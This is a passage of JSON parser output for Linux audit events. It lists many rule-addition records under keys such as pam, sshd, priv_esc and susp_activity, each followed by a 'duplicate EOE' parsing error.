"input": "node=null type=EOE msg=audit(1632470378.079:168): \n"
}
}
{
"ID": "1632470378.083:169",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "pam",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.083:169",
"input": "node=null type=EOE msg=audit(1632470378.083:169): \n"
}
}
{
"ID": "1632470378.083:170",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "pam",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.083:170",
"input": "node=null type=EOE msg=audit(1632470378.083:170): \n"
}
}
{
"ID": "1632470378.083:171",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "pam",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.083:171",
"input": "node=null type=EOE msg=audit(1632470378.083:171): \n"
}
}
{
"ID": "1632470378.083:172",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "pam",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.083:172",
"input": "node=null type=EOE msg=audit(1632470378.083:172): \n"
}
}
{
"ID": "1632470378.083:173",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "pam",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.083:173",
"input": "node=null type=EOE msg=audit(1632470378.083:173): \n"
}
}
{
"ID": "1632470378.083:174",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "mail",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.083:174",
"input": "node=null type=EOE msg=audit(1632470378.083:174): \n"
}
}
{
"ID": "1632470378.087:175",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "mail",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.087:175",
"input": "node=null type=EOE msg=audit(1632470378.087:175): \n"
}
}
{
"ID": "1632470378.087:176",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "mail",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.087:176",
"input": "node=null type=EOE msg=audit(1632470378.087:176): \n"
}
}
{
"ID": "1632470378.087:177",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sshd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.087:177",
"input": "node=null type=EOE msg=audit(1632470378.087:177): \n"
}
}
{
"ID": "1632470378.087:178",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sshd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.087:178",
"input": "node=null type=EOE msg=audit(1632470378.087:178): \n"
}
}
{
"ID": "1632470378.087:179",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "rootkey",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.087:179",
"input": "node=null type=EOE msg=audit(1632470378.087:179): \n"
}
}
{
"ID": "1632470378.087:180",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "systemd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.087:180",
"input": "node=null type=EOE msg=audit(1632470378.087:180): \n"
}
}
{
"ID": "1632470378.091:181",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "systemd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.091:181",
"input": "node=null type=EOE msg=audit(1632470378.091:181): \n"
}
}
{
"ID": "1632470378.091:182",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "mac_policy",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.091:182",
"input": "node=null type=EOE msg=audit(1632470378.091:182): \n"
}
}
{
"ID": "1632470378.091:183",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "unauthedfileaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.091:183",
"input": "node=null type=EOE msg=audit(1632470378.091:183): \n"
}
}
{
"ID": "1632470378.091:184",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "unauthedfileaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.091:184",
"input": "node=null type=EOE msg=audit(1632470378.091:184): \n"
}
}
{
"ID": "1632470378.091:185",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "unauthedfileaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.091:185",
"input": "node=null type=EOE msg=audit(1632470378.091:185): \n"
}
}
{
"ID": "1632470378.095:186",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "unauthedfileaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.095:186",
"input": "node=null type=EOE msg=audit(1632470378.095:186): \n"
}
}
{
"ID": "1632470378.095:187",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "unauthedfileaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.095:187",
"input": "node=null type=EOE msg=audit(1632470378.095:187): \n"
}
}
{
"ID": "1632470378.095:188",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "unauthedfileaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.095:188",
"input": "node=null type=EOE msg=audit(1632470378.095:188): \n"
}
}
{
"ID": "1632470378.095:189",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "unauthedfileaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.095:189",
"input": "node=null type=EOE msg=audit(1632470378.095:189): \n"
}
}
{
"ID": "1632470378.095:190",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "unauthedfileaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.095:190",
"input": "node=null type=EOE msg=audit(1632470378.095:190): \n"
}
}
{
"ID": "1632470378.099:191",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "priv_esc",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.099:191",
"input": "node=null type=EOE msg=audit(1632470378.099:191): \n"
}
}
{
"ID": "1632470378.099:192",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "priv_esc",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.099:192",
"input": "node=null type=EOE msg=audit(1632470378.099:192): \n"
}
}
{
"ID": "1632470378.099:193",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "priv_esc",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.099:193",
"input": "node=null type=EOE msg=audit(1632470378.099:193): \n"
}
}
{
"ID": "1632470378.099:194",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "priv_esc",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.099:194",
"input": "node=null type=EOE msg=audit(1632470378.099:194): \n"
}
}
{
"ID": "1632470378.099:195",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "power",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.099:195",
"input": "node=null type=EOE msg=audit(1632470378.099:195): \n"
}
}
{
"ID": "1632470378.099:196",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "power",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.099:196",
"input": "node=null type=EOE msg=audit(1632470378.099:196): \n"
}
}
{
"ID": "1632470378.103:197",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "power",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.103:197",
"input": "node=null type=EOE msg=audit(1632470378.103:197): \n"
}
}
{
"ID": "1632470378.103:198",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "power",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.103:198",
"input": "node=null type=EOE msg=audit(1632470378.103:198): \n"
}
}
{
"ID": "1632470378.103:199",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "session",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.103:199",
"input": "node=null type=EOE msg=audit(1632470378.103:199): \n"
}
}
{
"ID": "1632470378.103:200",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "session",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.103:200",
"input": "node=null type=EOE msg=audit(1632470378.103:200): \n"
}
}
{
"ID": "1632470378.103:201",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "session",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.103:201",
"input": "node=null type=EOE msg=audit(1632470378.103:201): \n"
}
}
{
"ID": "1632470378.107:202",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.107:202",
"input": "node=null type=EOE msg=audit(1632470378.107:202): \n"
}
}
{
"ID": "1632470378.107:203",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.107:203",
"input": "node=null type=EOE msg=audit(1632470378.107:203): \n"
}
}
{
"ID": "1632470378.107:204",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.107:204",
"input": "node=null type=EOE msg=audit(1632470378.107:204): \n"
}
}
{
"ID": "1632470378.107:205",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.107:205",
"input": "node=null type=EOE msg=audit(1632470378.107:205): \n"
}
}
{
"ID": "1632470378.107:206",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.107:206",
"input": "node=null type=EOE msg=audit(1632470378.107:206): \n"
}
}
{
"ID": "1632470378.107:207",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.107:207",
"input": "node=null type=EOE msg=audit(1632470378.107:207): \n"
}
}
{
"ID": "1632470378.107:208",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.107:208",
"input": "node=null type=EOE msg=audit(1632470378.107:208): \n"
}
}
{
"ID": "1632470378.111:209",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.111:209",
"input": "node=null type=EOE msg=audit(1632470378.111:209): \n"
}
}
{
"ID": "1632470378.111:210",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.111:210",
"input": "node=null type=EOE msg=audit(1632470378.111:210): \n"
}
}
{
"ID": "1632470378.111:211",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.111:211",
"input": "node=null type=EOE msg=audit(1632470378.111:211): \n"
}
}
{
"ID": "1632470378.111:212",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.111:212",
"input": "node=null type=EOE msg=audit(1632470378.111:212): \n"
}
}
{
"ID": "1632470378.111:213",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.111:213",
"input": "node=null type=EOE msg=audit(1632470378.111:213): \n"
}
}
{
"ID": "1632470378.111:214",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.111:214",
"input": "node=null type=EOE msg=audit(1632470378.111:214): \n"
}
}
{
"ID": "1632470378.111:215",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.111:215",
"input": "node=null type=EOE msg=audit(1632470378.111:215): \n"
}
}
{
"ID": "1632470378.111:216",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.111:216",
"input": "node=null type=EOE msg=audit(1632470378.111:216): \n"
}
}
{
"ID": "1632470378.115:217",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.115:217",
"input": "node=null type=EOE msg=audit(1632470378.115:217): \n"
}
}
{
"ID": "1632470378.115:218",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.115:218",
"input": "node=null type=EOE msg=audit(1632470378.115:218): \n"
}
}
{
"ID": "1632470378.115:219",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.115:219",
"input": "node=null type=EOE msg=audit(1632470378.115:219): \n"
}
}
{
"ID": "1632470378.115:220",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.115:220",
"input": "node=null type=EOE msg=audit(1632470378.115:220): \n"
}
}
{
"ID": "1632470378.115:221",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.115:221",
"input": "node=null type=EOE msg=audit(1632470378.115:221): \n"
}
}
{
"ID": "1632470378.115:222",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.115:222",
"input": "node=null type=EOE msg=audit(1632470378.115:222): \n"
}
}
{
"ID": "1632470378.115:223",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.115:223",
"input": "node=null type=EOE msg=audit(1632470378.115:223): \n"
}
}
{
"ID": "1632470378.119:224",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.119:224",
"input": "node=null type=EOE msg=audit(1632470378.119:224): \n"
}
}
{
"ID": "1632470378.119:225",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.119:225",
"input": "node=null type=EOE msg=audit(1632470378.119:225): \n"
}
}
{
"ID": "1632470378.119:226",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.119:226",
"input": "node=null type=EOE msg=audit(1632470378.119:226): \n"
}
}
{
"ID": "1632470378.119:227",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "perm_mod",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.119:227",
"input": "node=null type=EOE msg=audit(1632470378.119:227): \n"
}
}
{
"ID": "1632470378.119:228",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "recon",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.119:228",
"input": "node=null type=EOE msg=audit(1632470378.119:228): \n"
}
}
{
"ID": "1632470378.119:229",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "recon",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.119:229",
"input": "node=null type=EOE msg=audit(1632470378.119:229): \n"
}
}
{
"ID": "1632470378.119:230",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "recon",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.119:230",
"input": "node=null type=EOE msg=audit(1632470378.119:230): \n"
}
}
{
"ID": "1632470378.123:231",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "recon",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.123:231",
"input": "node=null type=EOE msg=audit(1632470378.123:231): \n"
}
}
{
"ID": "1632470378.123:232",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "recon",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.123:232",
"input": "node=null type=EOE msg=audit(1632470378.123:232): \n"
}
}
{
"ID": "1632470378.123:233",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "recon",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.123:233",
"input": "node=null type=EOE msg=audit(1632470378.123:233): \n"
}
}
{
"ID": "1632470378.123:234",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.123:234",
"input": "node=null type=EOE msg=audit(1632470378.123:234): \n"
}
}
{
"ID": "1632470378.123:235",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.123:235",
"input": "node=null type=EOE msg=audit(1632470378.123:235): \n"
}
}
{
"ID": "1632470378.127:236",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.127:236",
"input": "node=null type=EOE msg=audit(1632470378.127:236): \n"
}
}
{
"ID": "1632470378.127:237",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.127:237",
"input": "node=null type=EOE msg=audit(1632470378.127:237): \n"
}
}
{
"ID": "1632470378.127:238",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.127:238",
"input": "node=null type=EOE msg=audit(1632470378.127:238): \n"
}
}
{
"ID": "1632470378.127:239",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.127:239",
"input": "node=null type=EOE msg=audit(1632470378.127:239): \n"
}
}
{
"ID": "1632470378.127:240",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.127:240",
"input": "node=null type=EOE msg=audit(1632470378.127:240): \n"
}
}
{
"ID": "1632470378.127:241",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.127:241",
"input": "node=null type=EOE msg=audit(1632470378.127:241): \n"
}
}
{
"ID": "1632470378.131:242",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.131:242",
"input": "node=null type=EOE msg=audit(1632470378.131:242): \n"
}
}
{
"ID": "1632470378.131:243",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.131:243",
"input": "node=null type=EOE msg=audit(1632470378.131:243): \n"
}
}
{
"ID": "1632470378.131:244",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.131:244",
"input": "node=null type=EOE msg=audit(1632470378.131:244): \n"
}
}
{
"ID": "1632470378.131:245",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.131:245",
"input": "node=null type=EOE msg=audit(1632470378.131:245): \n"
}
}
{
"ID": "1632470378.131:246",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.131:246",
"input": "node=null type=EOE msg=audit(1632470378.131:246): \n"
}
}
{
"ID": "1632470378.135:247",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.135:247",
"input": "node=null type=EOE msg=audit(1632470378.135:247): \n"
}
}
{
"ID": "1632470378.135:248",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.135:248",
"input": "node=null type=EOE msg=audit(1632470378.135:248): \n"
}
}
{
"ID": "1632470378.135:249",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.135:249",
"input": "node=null type=EOE msg=audit(1632470378.135:249): \n"
}
}
{
"ID": "1632470378.135:250",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.135:250",
"input": "node=null type=EOE msg=audit(1632470378.135:250): \n"
}
}
{
"ID": "1632470378.135:251",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "susp_activity",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.135:251",
"input": "node=null type=EOE msg=audit(1632470378.135:251): \n"
}
}
{
"ID": "1632470378.139:252",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.139:252",
"input": "node=null type=EOE msg=audit(1632470378.139:252): \n"
}
}
{
"ID": "1632470378.139:253",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.139:253",
"input": "node=null type=EOE msg=audit(1632470378.139:253): \n"
}
}
{
"ID": "1632470378.139:254",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.139:254",
"input": "node=null type=EOE msg=audit(1632470378.139:254): \n"
}
}
{
"ID": "1632470378.139:255",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.139:255",
"input": "node=null type=EOE msg=audit(1632470378.139:255): \n"
}
}
{
"ID": "1632470378.139:256",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.139:256",
"input": "node=null type=EOE msg=audit(1632470378.139:256): \n"
}
}
{
"ID": "1632470378.143:257",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.143:257",
"input": "node=null type=EOE msg=audit(1632470378.143:257): \n"
}
}
{
"ID": "1632470378.143:258",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.143:258",
"input": "node=null type=EOE msg=audit(1632470378.143:258): \n"
}
}
{
"ID": "1632470378.143:259",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.143:259",
"input": "node=null type=EOE msg=audit(1632470378.143:259): \n"
}
}
{
"ID": "1632470378.143:260",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.143:260",
"input": "node=null type=EOE msg=audit(1632470378.143:260): \n"
}
}
{
"ID": "1632470378.143:261",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sbin_susp",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.143:261",
"input": "node=null type=EOE msg=audit(1632470378.143:261): \n"
}
}
{
"ID": "1632470378.147:262",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "dbus_send",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.147:262",
"input": "node=null type=EOE msg=audit(1632470378.147:262): \n"
}
}
{
"ID": "1632470378.147:263",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "shell_profiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.147:263",
